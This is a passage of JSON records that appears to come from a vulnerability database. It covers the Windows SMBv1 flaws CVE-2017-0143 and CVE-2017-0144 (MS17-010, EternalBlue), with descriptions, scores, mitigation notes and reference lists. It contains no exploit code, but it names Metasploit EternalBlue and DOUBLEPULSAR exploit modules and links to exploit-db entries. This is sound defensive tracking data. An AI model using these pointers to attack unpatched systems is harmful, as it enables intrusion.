"MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-07-20T20:14:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-07-20T20:14:39", "rev": 2}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.securityfocus.com/bid/96703"], "Advisory": ["https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", 
"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970"], "Miscellaneous": ["https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2020-09-08T17:05:00"}, "lastseen": "2021-07-20T20:14:39", "differentElements": ["attackerkb", "cvss2", "cvss3", "last_activity", "references_categories", "tags", "wildExploited"], "edition": 5}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "fc3435eeb89f98d367e167f793e8d9ae384cf384f773cee18e45b61b8c325ec4", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; 
Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\n**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", 
"https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-20T20:14:39", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2021-07-20T20:14:39", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", 
"THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", 
"SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-20T20:14:39", "rev": 2, "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.5", "attackerkb": {}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {}, "tags": [], "mitre_vector": {}, "last_activity": null}, "lastseen": "2021-07-20T20:14:39", "differentElements": ["attackerkb", "cvss2", "cvss3", "last_activity", "references_categories", "tags", "wildExploited", "wildExploitedCategory", "wildExploitedReports"], "edition": 6}], "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", 
"MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-03T16:41:41", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2021-11-03T16:41:41", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://us-cert.cisa.gov/ncas/alerts/aa20-133a", "published": "2021-11-03T15:27:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.securityfocus.com/bid/96703"], "Advisory": ["https://www.exploit-db.com/exploits/41891", 
"http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970"], "Miscellaneous": ["https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2021-11-03T15:27:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.base.Bulletin", "robots.models.attackerkb.AttackerKB"]}, {"id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "hash": "d04213b4b44a7f61713381fe039d09f448cbf49978927b69da7d266cee06f787", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0144 (MS17-010)", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": 
"https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "https://www.exploit-db.com/exploits/42031", "https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-20T20:10:58", "history": [{"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 4}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "enchantments": 
{"dependencies": {"modified": "2021-01-27T12:09:36", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": 
["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"], 
"type": "attackerkb"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-01-27T12:09:36", "rev": 2, "value": 7.0, "vector": "NONE"}}, "hash": "050c2a8e8805c2f99989043cb5682649", "history": [], "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "immutableFields": [], "last_activity": null, "lastseen": "2021-01-27T12:09:36", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0144 (MS17-010)", "type": "attackerkb", "viewCount": 3, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["references_categories"], "edition": 1, "lastseen": "2021-01-27T12:09:36"}, {"bulletin": 